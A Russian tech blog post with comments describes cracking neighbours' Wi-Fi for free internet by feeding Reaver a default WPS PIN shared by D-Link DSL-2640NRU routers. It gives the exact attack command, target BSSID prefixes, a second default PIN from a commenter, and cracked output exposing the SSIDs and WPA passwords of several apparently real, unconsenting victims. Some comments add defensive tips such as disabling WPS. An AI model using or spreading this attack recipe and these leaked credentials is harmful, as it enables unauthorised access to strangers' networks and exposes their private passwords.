Взломать Wi-Fi за… 3 секунды

Какой человек не любит халявы? Практически все ее просто обожают, и я не исключение. Вдохновленный статьей «Взломать Wi-Fi за 10 часов» я достал из недр харда BT5, скачанный ранее, и записал его на болванку. Результат не заставил себя ждать, и первый пароль был получен на следующее утро. И понеслась…

Однако, каково же было мое удивление, когда у второй жертвы оказался тот же пин-код, что и у первой (в частности такой: 46264848). Замечу, что роутеры были одинаковые, D'Link DSL 2640NRU, пожалуй, самая распространенная модель на рынке. С версией прошивки 1.0.10.

В итоге, из 6 аппаратов (из них было 5 Д'Линков), попавшихся мне, у 4 были одинаковые пин-коды, которые, кстати, меняются после прошивки и восстанавливаются после обратного перехода на 1.0.10. В чем дело: одна партия роутеров? Одна прошивка? Не знаю, но факт остается фактом, время атаки на львиную долю роутеров можно сократить с 2-∞ часов до нескольких секуннд, учитывая, что большинству людей плевать на безопасность своей сети (из-за своей лени или невежества?).

Для этого нужно всего лишь вписать конкретный пин-код в команду Reaverу:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p 46264848 -vv

В сухом остатке имеем:

image
image

Или так…

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '12316061989'
[+] AP SSID: 'Shat_SatyricoN'

[+] Pin cracked in 51 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3159801111'
[+] AP SSID: 'DOMIK'

[+] Pin cracked in 47 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '29051966'
[+] AP SSID: 'serg'

[+] Pin cracked in 17 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '19361'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: '3CQEPazxYCGY'
[+] AP SSID: 'Home'

[+] Pin cracked in 15 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'dimetriys80'
[+] AP SSID: 'DSL_2640NRU'

[+] Pin cracked in 3 seconds
[+] WPS PIN: '46264848'
[+] WPA PSK: 'ton_ton75'
[+] AP SSID: 'DSL_2640NRU'

(Надеюсь, хозяева сетей не читают Хабр)

BSSID роутеров, которые стоит попробовать на вкус, чаще всего начинаются с
B8:A3:86
C8:BE:19
1C:7E:E5 (полный список смотри тут)

Также замечу, что сети часто не переименовывают, и в списке доступных почти всегда висит по нескольку «DSL_2640NRU».
Поделиться публикацией
AdBlock похитил этот баннер, но баннеры не зубы — отрастут

Подробнее
Реклама
Комментарии 63
  • –28
    Зря вы всё это в паблик выложили. Некрасиво как-то, по-моему. Лучше бы тем же соседям как нибудь ткнули на это, чтобы исправили.

    > (Надеюсь, хозяева сетей не читают Хабр)
    Лучше бы прочли и закрыли дыру в безопасности.
    • +1
      В смысле, лучше было бы, если всё же читают Хабр.
      • 0
        Формально статья и написана для того, чтоб люди опомнились и закрыли дыры, так же как и BackTrack — это система для тестирования на уязвимости сетей
        • 0
          Это-то понятно. Проблема в том, что большинство, кто сидит на Хабре, и так за этим следят. Как минимум на подсознательном уровне, что прошивку надо своевременно обновлять и всё такое. А те, кого это касается — не прочтут. Ну или по счастливой случайности, вбив в поиск свой SSID
          • +1
            Об уязвимости известно давно, и, если ты пользуешься чем-то, то стоит узнать об этом побольше, и защитить себя. Спасение утопающих… А касаемо соседей, то я их не знаю, хата съемная)
        • 0
          Если он и исправит ситуацию с соседями, что это даст? Это же глобальная проблема! Даже если все пользователи хабра залатают дыры своих соседей не факт что это поможет!
          • 0
            С масштабами проблемы согласен. Я говорю про SSID сети и PSK ключи. По моему, это как-то неприлично. Ну что ж, у каждого на это своё мнение.
            • 0
              Хм. А если написать в саппорт Длинка, они быстро отреагируют? И отреагируют ли вообще?
          • 0
            Пароль от еще одного Wi-Fi дома никогда не повредит. Как минимум для того чтоб оплатить свой интернет :)
          • +2
            46264848

            У двух моих соседей такой же :)
            • +2
              О чем, собственно, я и не думал совсем до прочтения поста. Спасибо
            • –2
              У меня была проблема другого характера… на работе есть keenetic для раздачи служебного диапазона… столкнулся раза 2 ( произвольный сброс на заводские ( с открытым инетом и без шифрования… прошивка последняя… роутер без доступа физического… на отдельном vlan (Это и спасло)… тестируйте вифи перед подключением в боевую сеть, коллеги… Спасибо за внимание… рад выслушать мнения и рекомендации...P.S. роутеров несколько таких но одна партия.
              • НЛО прилетело и опубликовало эту надпись здесь
                • 0
                  Раньше соседняя точка ZyXEL Keenetic пробивалась через reaver (inflator), теперь wash -i mon0 её не показывает, полагаю прошивку обновили и отключили WPS.
                  • НЛО прилетело и опубликовало эту надпись здесь
                • +9
                  рукалицо.
                  1. что значит этот набор слов и скобок?
                  2. почему только одна точка в конце?
                • 0
                  Нужно больше точек!
                • +3
                  У моих соседей.

                  С версией прошивки 1.0.10.
                  Скрытый текст
                  46264848

                  С версией прошивки 1.0.48. (DSL_2640NRU)
                  Скрытый текст
                  76229909
                  • –6
                    золотой пост
                    • –2
                      может и у других роутэров есть дэфалтные пины
                      • 0
                        Присоединяюсь, в Украине, тоже не сменен на DSL-2640NRU PIN 46264848
                        • +16
                          Мораль басни — юзайте DD-WRT!
                          • –13
                            +1
                            • 0
                              минус много =)
                              • –1
                                интересно чего? От сетевой безопасности вы по-видимому далеки
                                • 0
                                  Голосов, потому что комментировать надо по делу. А для + или — 1 существуют голосование за комментарий, они как бы удобнее.

                                  От сетевой безопасности наверное далек, но статья на меня не распространяется даже с базовой глючащей прошивкой версии 1.03 от 2007-го года, которую мне тупо лень перепрошивать.
                            • 0
                              По-моему, эту мораль глаголят 99% стоковых прошивок роутеров.
                              Мой Netgear WNDR3700, благо что железно крайне годен (и нынче под OpenWRT работает как часы) радостно отваливал DNS Resolve в течение 15 минут. К тому же, там не хватало вполне базовой функциональности, а при включении мак-фильтрации гостевая сеть так же фильтровалась, что делало ее бесполезной.
                              • 0
                                А я впервые от вас узнал об этом. Благодарю.
                                • +1
                                  Зачем ссылки с ошибкой?
                                  • 0
                                    Извините, налажал с разметкой.
                                    Ссылки рабочие, скопируйте и вставьте в новой вкладке.
                                • 0
                                  Надо это пост в блокнотик записать или заскроблить иначе его просто спрячут.
                                  • 0
                                    Надо бы базу стандартных пинов организовать
                                  • 0
                                    Отключать нафиг этот WPS где только можно.
                                    Менять его пин.
                                    Менять дефолтный пароль, по возможности и логин к админке точки доступа.
                                    Использовать более сложный пароль для WIFI.
                                    Сменить дефолтный SSID.
                                    Скрыть SSID хотя бы от хомячков.
                                    Фильтровать клиентов по макам.
                                    Фильтровать доступ к админкам самой точки.
                                    • 0
                                      Тема для статьи?..
                                      • 0
                                        А то мало этих статей?
                                        На мой взгляд это минимальная база которую следует сделать перед включением ДОМАШНЕЙ точки в работу.
                                        • 0
                                          Полностью согласен, но большинству людей до лампочки, что не может не печалить.
                                          • 0
                                            Дело не в «до лампочки» а в банальном непонимаи чем грозит нечитае инструкций по настройке.
                                            Ну или вот еще приходят мальчики от провайдера — они с той точкой морочиться тоже не будут — а потом по району светится полторы сотни точек с абсолютно одинаковым SSID, рекламирующим этого оператора.
                                      • 0
                                        Отключать нафиг этот WPS где только можно.

                                        Сменить дефолтный SSID.
                                        ...

                                        Так и делаю. Удивительно, как можно иначе. У нас самый большой провайдер ставит всем по-дефолту одинаковый SSID «Internet», а в дополнение к нему ещё в некоторых модемах делает вторую сеть «VOIP», в результате в типовой квартире ловится как минимум несколько «интернетов» и «воипов» и когда переходишь с одного места в другое комп автоматически пытается (ессно безуспешно т.к. PSK не совпадает) залогиниться в «знакомую» сеть.
                                        • 0
                                          По BSSID фильтрацию не включить?
                                          • 0
                                            А как его узнать этот BSSID?
                                            • 0
                                              Под виндой — не уверен, а под линуксом (при подключенном вайфае) —
                                              $ iwconfig
                                              wlan0	IEEE 802.11bg	ESSID:"Wireless"
                                              	Mode:Managed	Frequency:2.452 GHz	Access Point: XX:XX:XX:XX:XX:XX

                                              XX:XX:XX:XX:XX:XX и есть BSSID вашей точки.
                                          • +1
                                            А мне не жалко инета — гостевой ssid с отдельным зашейпенным VLANом =)
                                            • 0
                                              Всегда удивлялся людям вроде Вас. Понимаете ли, тут дело вовсе не в том жалко или не жалко, а в том, что раздавать инет проходимцам — это почти тоже самое, что доверять единицу огнестрельного оружия, зарегистрированную на Вас неизвестно кому. Мир опасен, в нем кишит много индивидов, которые легко могут совершить в сети нечто такое, что неизбежно приведет Вас к тесному общению с представителями правоохранительных структур (это еще если повезет, то правоохранительных).
                                          • +1
                                            Скрывать SSID бесполезно. Фильтровать MAC еще более бесполезно. Все остальное актуально, но на самом деле гораздо проще (и удобнее) держать открытый гостевой wifi с isolation.
                                            Другое дело, что у меня у половины соседей wep и админка под паролем admin (мне сосед так сказал)
                                          • +1
                                            если б еще reaver был бы на android…
                                          • 0
                                            ushanov90, ты случаем не из Пушкина? А то у меня предложенный тобой пароль от сетки Home подошёл… :) И некто DSL_2640NRU иногда в радиусе скана появляется… совпадение?
                                            • 0
                                              Хм… Не из Пушкина… Совпадение. Мистика да и только.
                                            • 0
                                              Вам удалось агрегировать несколько wi-fi каналов? Даже не задавался таким вопросом никогда, сколь одновременных соединений может быть у обычного вайфай контроллера компьютера?
                                            • 0
                                              логины, пароли, SSID… еще какой-то WPS PIN придумали. что это зачем?
                                              • 0
                                                Нашел в первой статье все. СБ, я этим не пользуюсь
                                                • 0
                                                  Теперь убедитесь, что этим не пользуется ваш AP :)
                                                  • 0
                                                    Что то не соображу AP — это кто-что?
                                            • 0
                                              А пробовал кто-нибудь прямую атаку на WPA предполагая, что PSK — номер телефона?
                                              Ключи подобного рода сейчас слишком распространенная практика.
                                              • 0
                                                Собсно атака на WPA/WPA2 сводится к сбору хендшейков. В Backtrack добавили суперскую утилиту besside-ng, которая делает все необходимые операции. После этого остается только запастись нормальными словарями, попкорном (ну и терпением :) и заюзать hashcat.
                                              • +4
                                                Я ломал соседние точки не ради халявы, а чтобы перевесить их на другой канал, и освободить себе 13, а то работать вообще невозможно было.
                                                • –1
                                                  Никогда не наблюдал каких-либо проблем с каналами.
                                                  Как это проявляется? Скорость проседает?

                                                Только полноправные пользователи могут оставлять комментарии. Войдите, пожалуйста.